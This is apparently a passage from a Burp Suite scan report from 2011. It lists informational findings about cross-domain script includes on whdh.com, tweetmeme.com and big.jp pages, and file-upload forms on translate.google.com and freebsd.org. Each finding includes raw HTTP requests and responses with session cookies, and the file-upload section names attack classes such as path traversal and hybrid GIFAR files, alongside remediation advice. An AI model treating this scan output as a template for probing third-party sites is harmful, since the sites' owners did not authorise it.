Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:25 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:57:25 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:25 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23072
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: January 18 Snow/Ice Storm</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1585. http://www1.whdh.com/slideshows/view/January21SnowStorm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /slideshows/view/January21SnowStorm

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /slideshows/view/January21SnowStorm HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:19 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21934
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: January 21 Snow Storm</title>
<meta name="publisher" content="New Engl
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1586. http://www1.whdh.com/stormforce/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /stormforce/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /stormforce/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:56 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=436
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:04:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14316
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Stormforce - Snow Day Alerts</title>
<meta name="publisher" content="New England New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1587. http://www1.whdh.com/termsofuse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /termsofuse

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /termsofuse HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: termsofuse.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=172800
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 26 Jan 2011 21:56:19 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close
Content-Length: 23953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Terms of Use, Site Disclaimer</title>
<meta name="publisher" con
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1588. http://www1.whdh.com/traffic/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /traffic/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://www.google.com/jsapi
  • http://www.sigalert.com/Data/RenderPortal.js

Request

GET /traffic/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:12 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1750
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:25:33 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close
Content-Length: 8278

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS - Fast Track Traffic</title>
<meta name="publisher" content="New Engla
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</noscript>
<script src="http://www.sigalert.com/Data/RenderPortal.js"></script>
...[SNIP]...

21.1589. http://www1.whdh.com/video/7newslive

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /video/7newslive

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /video/7newslive HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:20 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: 7newslive.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:09 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close
Content-Length: 8674

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>7News Live Streaming Video</title>
<meta name="publisher" content="New England News
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1590. http://www1.whdh.com/video/player

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /video/player

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /video/player HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:23 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: player.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=900
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:24:29 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107103 (MII-APC/1.6)
Connection: close
Content-Length: 21966

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS - Top Video Video</title>
<meta name="publisher" content="New England
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1591. http://www1.whdh.com/video/player/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /video/player/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /video/player/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:07 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 3
Cache-Control: max-age=425
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:03:22 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Content-Length: 21966
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS - Top Video Video</title>
<meta name="publisher" content="New England
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1592. http://www1.whdh.com/weather/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /weather/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://wn.wsvn.com/global/video/flash/WNVideo.asp?1
  • http://www.google.com/jsapi

Request

GET /weather/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:45:24 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 696
Cache-Control: max-age=723
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 21:56:37 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107003 (MII-APC/1.6)
Content-Length: 54167
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH 7NEWS NBC Boston Weather Complete Local Weather Coverage</title>
<meta name="pu
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://wn.wsvn.com/global/video/flash/WNVideo.asp?1"></script>
...[SNIP]...

21.1593. http://www1.whdh.com/weather/radar/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /weather/radar/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /weather/radar/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:03 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=773
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:09:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10391
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Interactive Radar</title>
<meta name="publisher" content="New England News Station B
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1594. http://www25.big.jp/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www25.big.jp
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /favicon.ico HTTP/1.1
Host: www25.big.jp
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:07 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2574
Content-Type: text/html; charset=UTF-8


<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/favicon.ico</Title>
<Meta Http-equiv="content-type" Content="text/html; charset=utf-8"
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1595. http://www25.big.jp/~jam/leafnode+/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www25.big.jp
Path:   /~jam/leafnode+/

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /~jam/leafnode+/ HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:02 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2582
Connection: close
Content-Type: text/html; charset=UTF-8


<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jam/leafnode+/</Title>
<Meta Http-equiv="content-type" Content="text/html; charset=ut
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1596. http://www3.whdh.com/mobile/phoneforecast/settings.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www3.whdh.com
Path:   /mobile/phoneforecast/settings.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /mobile/phoneforecast/settings.php HTTP/1.1
Host: www3.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:25 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: WHDHSTR=10276375ee09de38c9ed3d9e2f331510; expires=Thu, 26-Jan-2012 00:10:25 GMT; path=/; domain=.whdh.com
Set-Cookie: PHPSESSID=b403bd4dcacdf2dc04e785e91ecaa8a7; path=/
Expires: Wed, 26 Jan 2011 00:10:25 GMT
Cache-Control: max-age=86400, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10202

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Mobile Alerts - Daily Phone Forecast Account Settings</title>
<meta name="publisher"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1597. http://xfactor.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xfactor.tweetmeme.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: xfactor.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:40:45 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=a4d8db2993601638d04abd7579c4807a; expires=Tue, 01-Feb-2011 04:40:45 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0037000179290771
X-Served-In: 0.97312808036804
X-Served-By: h03
Content-Length: 42682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.1598. http://yoga.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yoga.tweetmeme.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: yoga.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:40:54 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=dc2ca952c1c37e52f76eb77141d10a94; expires=Tue, 01-Feb-2011 04:40:54 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.004396915435791
X-Served-In: 0.036845922470093
X-Served-By: ded2059
Content-Length: 40246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.1599. http://youtube.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://youtube.tweetmeme.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: youtube.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 04:41:00 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=94b6566617ce940cd794bf1274e16135; expires=Tue, 01-Feb-2011 04:41:00 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0044999122619629
X-Served-In: 0.045840978622437
X-Served-By: h01
Content-Length: 40368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

22. File upload functionality
There are 6 instances of this issue:

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:
  • File path traversal
  • Persistent cross-site scripting
  • Placing of other client-executable code into the domain
  • Transmission of viruses and other malware
  • Denial of service
You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:
  • Whether uploaded content can subsequently be downloaded via a URL within the application.
  • What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
  • Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
  • Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
  • Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
  • What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
  • Whether archive formats such as ZIP are unpacked by the application.
  • How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:
  • Use a server-generated filename if storing uploaded files on disk.
  • Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
  • Enforce a whitelist of accepted, non-executable file extensions.
  • If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
  • Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server's configuration).
  • Reject attempts to upload archive formats such as ZIP.



22.1. http://translate.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:
  • http://translate.google.com/
Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:34 GMT
Expires: Mon, 24 Jan 2011 16:02:34 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=6837c8c340aa3ef0:TM=1295884954:LM=1295884954:S=IxvWEj2Jnkrx4IAL; expires=Wed, 23-Jan-2013 16:02:34 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><input type=file name=file id=file size=40></div>
...[SNIP]...

22.2. http://translate.google.com/translate_t

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:
  • http://translate.google.com/
Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /translate_t?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:37 GMT
Expires: Mon, 24 Jan 2011 16:02:37 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=58e54bef485bd12c:TM=1295884957:LM=1295884957:S=BeWfOb0gwP1Q71Gx; expires=Wed, 23-Jan-2013 16:02:37 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><input type=file name=file id=file size=40></div>
...[SNIP]...

22.3. http://www.freebsd.org/send-pr.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /send-pr.html

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:
  • http://www.freebsd.org/cgi/dosendpr.cgi
Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /send-pr.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2587588304"
Last-Modified: Tue, 04 Jan 2011 20:39:09 GMT
Content-Length: 12238
Connection: close
Date: Mon, 24 Jan 2011 16:39:38 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...
